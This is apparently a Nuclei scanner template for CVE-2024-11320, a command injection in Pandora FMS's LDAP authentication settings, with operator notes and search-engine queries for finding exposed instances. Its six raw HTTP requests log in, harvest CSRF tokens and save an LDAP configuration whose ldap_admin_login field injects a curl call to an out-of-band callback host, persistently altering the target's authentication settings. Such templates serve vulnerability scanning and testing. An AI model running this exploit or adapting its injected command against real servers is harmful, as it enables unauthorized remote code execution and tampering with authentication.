Vulnerability description
Arbitrary command execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS from 700 through 777.4 (inclusive). Note that the template below requires valid Pandora FMS credentials that can edit the authentication setup page, and that it persistently changes the target's authentication settings (nothing in the template reverts them).
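# Nuclei template for CVE-2024-11320 (Pandora FMS, command injection via the
# LDAP settings on the authentication setup page).
#
# Operator notes:
#   * Every request after the first runs in an authenticated session: supply
#     valid Pandora FMS credentials (-var username=... -var password=...) that
#     can reach and edit the Setup > Authentication page ("godmode" area).
#     The CVSS vector below records PR:N, but this template cannot run
#     unauthenticated.
#   * Step 5 PERSISTENTLY rewrites the target's authentication settings (auth
#     method switched to LDAP, session timeout, fallback/2FA flags). Nothing
#     below reverts them; restore the original settings by hand afterwards.
#     fallback_local_auth=1 is what keeps local logins working in the meantime.
#   * Detection relies solely on an out-of-band DNS callback. A host that cannot
#     resolve external names reports as "not vulnerable" even if the injected
#     command ran (false negative), so treat a miss as inconclusive.
#   * The original ProjectDiscovery signature (# digest: ...) was dropped because
#     it no longer matches this edited content; re-sign the template with
#     nuclei's template signing if your deployment enforces signatures.
id: CVE-2024-11320

info:
  name: Pandora FMS v7.0NG.777.3 - Remote Code Execution
  author: DhiyaneshDK,Shubham Rooter,pdresearch,iamnoooob
  severity: critical
  description: |
    Arbitrary command execution on the server by exploiting a command injection
    vulnerability in the LDAP authentication mechanism (this template injects
    through the ldap_admin_login setting on the authentication setup page).
    This issue affects Pandora FMS from 700 through 777.4 (inclusive).
  remediation: Upgrade Pandora FMS to a release later than 777.4 (see the vendor advisory / NVD entry).
  reference:
    - https://github.com/mhaskar/CVE-2024-11320
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11320
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-11320
    cwe-id: CWE-77
    epss-score: 0.92171
    epss-percentile: 0.99702
    cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: pandorafms
    product: pandora_fms
    shodan-query:
      - http.html:"pandora fms - installation wizard"
      - http.title:"pandora fms"
    fofa-query:
      - body="pandora fms - installation wizard"
      - title="pandora fms"
    google-query: intitle:"pandora fms"
  # "intrusive" marks the template as state-changing so default scans skip it.
  tags: cve,cve2024,oast,rce,pandora,fms,intrusive

# All six requests must succeed in order; each step feeds the next.
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

http:
  # 1. Load the login page and harvest its CSRF token.
  - raw:
      - |
        GET /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_code
        group: 1
        internal: true
        regex:
          - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'

  # 2. Authenticate with the supplied credentials. A 302 that sets PHPSESSID is
  #    taken as a successful login; the session cookie is reused by later steps.
  - raw:
      - |
        POST /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}

    matchers:
      - type: dsl
        internal: true
        condition: and
        dsl:
          - status_code == 302
          - contains(set_cookie, 'PHPSESSID=')

  # 3. Confirm the session is live by loading the post-login dashboard.
  - raw:
      - |
        GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        condition: and
        dsl:
          - status_code == 200
          - contains(body, 'Server health')

  # 4. Open the authentication setup page (requires setup privileges) and take
  #    its own CSRF token, which differs from the login page's.
  - raw:
      - |
        GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_code2
        group: 1
        internal: true
        regex:
          - 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'

    matchers:
      - type: dsl
        internal: true
        condition: and
        dsl:
          - status_code == 200
          - contains_all(body, 'Authentication method</td>', 'LDAP')

  # 5. Save the LDAP configuration with the payload in ldap_admin_login:
  #    ';curl xxxxzz.<interactsh> # (URL-encoded). The other LDAP fields
  #    (localhost:389, the double-encoded base DN, etc.) are placeholders only.
  #    WARNING: this overwrites the target's authentication settings and is not
  #    undone by the template.
  - raw:
      - |
        POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup&section=auth
        Content-Type: application/x-www-form-urlencoded

        update_config=1&csrf_code={{csrf_code2}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3bcurl%20xxxxzz.{{interactsh-url}}%20%23&ldap_admin_pass=&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%253DPeople%252Cdc%253Dedu%252Cdc%253Dexample%252Cdc%253Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local

    matchers:
      - type: dsl
        internal: true
        condition: and
        dsl:
          - status_code == 200
          - contains(body,'Correctly updated the setup options')

  # 6. Hit the login page again without the session cookie so the request goes
  #    through the (now LDAP-backed) authentication path, and wait for the
  #    injected curl to resolve the interactsh name. NOTE(review): that this
  #    cookie-less GET alone triggers the LDAP code path is what the template
  #    assumes; confirm against the referenced PoC if callbacks never arrive on
  #    a host known to be affected.
  - raw:
      - |
        GET /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}

    disable-cookie: true

    # DNS is the most reliable OAST signal: it fires as soon as curl resolves
    # the name, even if outbound HTTP is blocked.
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns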